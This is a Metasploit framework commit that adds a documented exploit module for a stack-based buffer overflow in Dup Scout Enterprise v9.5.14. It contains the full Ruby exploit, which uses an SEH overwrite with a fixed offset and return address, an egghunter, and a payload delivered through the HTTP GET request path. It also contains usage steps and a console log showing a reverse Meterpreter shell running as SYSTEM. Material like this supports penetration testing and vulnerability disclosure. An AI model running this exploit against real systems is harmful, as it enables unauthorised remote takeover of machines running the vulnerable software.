Land rapid7#8303, Buffer Overflow on Dupscout Enterprise v9.5.14

Author: wwebb-r7

documentation/modules/exploit/windows/http/dupscts_bof.md

@@ -0,0 +1,73 @@
+## Vulnerable Application
+
+[Dup Scout Enterprise](http://www.dupscout.com) versions up to v9.5.14 are affected by a stack-based buffer overflow vulnerability which can be leveraged by an attacker to execute arbitrary code in the context of NT AUTHORITY\SYSTEM on the target. The vulnerability is caused by improper bounds checking of the request path in HTTP GET requests sent to the built-in web server. This module has been tested successfully on Windows 7 SP1. The vulnerable application is available for download at [Exploit-DB](https://www.exploit-db.com/apps/4ead3eadc19bf3511e8dfd606624e310-dupscoutent_setup_v9.1.14.exe).
+
+## Verification Steps
+  1. Install a vulnerable Dup Scout Enterprise
+  2. Start `Dup Scout Enterprise` service
+  3. Start `Dup Scout Enterprise` client application
+  4. Navigate to `Tools` > `Dup Scout Options` > `Server`
+  5. Check `Enable Web Server On Port 80` to start the web interface
+  6. Start `msfconsole`
+  7. Do `use exploit/windows/http/dupscts_bof`
+  8. Do `set RHOST ip`
+  9. Do `check`
+  10. Verify the target is vulnerable
+  11. Do `set PAYLOAD windows/meterpreter/reverse_tcp`
+  12. Do `set LHOST ip`
+  13. Do `exploit`
+  14. Verify the Meterpreter session is opened
+
+## Scenarios
+
+###Dup Scout Enterprise v9.5.14 on Windows 7 SP1
+
+```
+msf exploit(dupscts_bof) > show options 
+
+Module options (exploit/windows/http/dupscts_bof):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOST    172.16.0.18      yes       The target address
+   RPORT    80               yes       The target port (TCP)
+   SSL      false            no        Negotiate SSL/TLS for outgoing connections
+   VHOST                     no        HTTP server virtual host
+
+
+Payload options (windows/meterpreter/reverse_tcp):
+
+   Name      Current Setting  Required  Description
+   ----      ---------------  --------  -----------
+   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
+   LHOST     172.16.0.20      yes       The listen address
+   LPORT     4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Dup Scout Enterprise v9.5.14
+
+
+msf exploit(dupscts_bof) > exploit 
+
+[*] Started reverse TCP handler on 172.16.0.20:4444 
+[*] Sending request...
+[*] Sending stage (957487 bytes) to 172.16.0.18
+[*] Meterpreter session 1 opened (172.16.0.20:4444 -> 172.16.0.18:49162) at 2017-04-26 15:16:08 +0100
+
+meterpreter > getuid 
+Server username: NT AUTHORITY\SYSTEM
+meterpreter > sysinfo 
+Computer        : PC-01
+OS              : Windows 7 (Build 7600).
+Architecture    : x86
+System Language : pt_PT
+Domain          : LAB
+Logged On Users : 3
+Meterpreter     : x86/windows
+meterpreter > 
+```

modules/exploits/windows/http/dupscts_bof.rb

@@ -0,0 +1,105 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = GreatRanking
+
+  include Msf::Exploit::Remote::Seh
+  include Msf::Exploit::Remote::Egghunter
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Dup Scout Enterprise GET Buffer Overflow',
+      'Description'    => %q{
+        This module exploits a stack-based buffer overflow vulnerability
+        in the web interface of Dup Scout Enterprise v9.5.14, caused by
+        improper bounds checking of the request path in HTTP GET requests
+        sent to the built-in web server. This module has been tested
+        successfully on Windows 7 SP1 x86.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'vportal',	     # Vulnerability discovery and PoC
+          'Daniel Teixeira'  # Metasploit module
+        ],
+      'DefaultOptions' =>
+        {
+          'EXITFUNC' => 'thread'
+        },
+      'Platform'       => 'win',
+      'Payload'        =>
+        {
+          'BadChars'   => "\x00\x09\x0a\x0d\x20\x26",
+          'Space'      => 500
+        },
+      'Targets'        =>
+        [
+          [ 'Dup Scout Enterprise v9.5.14',
+            {
+              'Offset' => 2488,
+              'Ret'    => 0x10050ff3  # POP # POP # RET [libspp.dll]
+            }
+          ]
+        ],
+      'Privileged'     => true,
+      'DisclosureDate' => 'Mar 15 2017',
+      'DefaultTarget'  => 0))
+  end
+
+  def check
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri'    => '/'
+    )
+
+    if res && res.code == 200
+      version = res.body[/Dup Scout Enterprise v[^<]*/]
+      if version
+        vprint_status("Version detected: #{version}")
+        if version =~ /9\.5\.14/
+          return Exploit::CheckCode::Appears
+        end
+        return Exploit::CheckCode::Detected
+      end
+    else
+      vprint_error('Unable to determine due to a HTTP connection timeout')
+      return Exploit::CheckCode::Unknown
+    end
+
+    Exploit::CheckCode::Safe
+  end
+
+  def exploit
+
+    eggoptions = {
+      checksum: true,
+      eggtag: rand_text_alpha(4, payload_badchars)
+    }
+
+    hunter, egg = generate_egghunter(
+      payload.encoded,
+      payload_badchars,
+      eggoptions
+    )
+
+    sploit =  rand_text_alpha(target['Offset'])
+    sploit << generate_seh_record(target.ret)
+    sploit << hunter
+    sploit << make_nops(10)
+    sploit << egg
+    sploit << rand_text_alpha(5500)
+
+    print_status('Sending request...')
+
+    send_request_cgi(
+      'method' => 'GET',
+      'uri'    => sploit
+    )
+  end
+end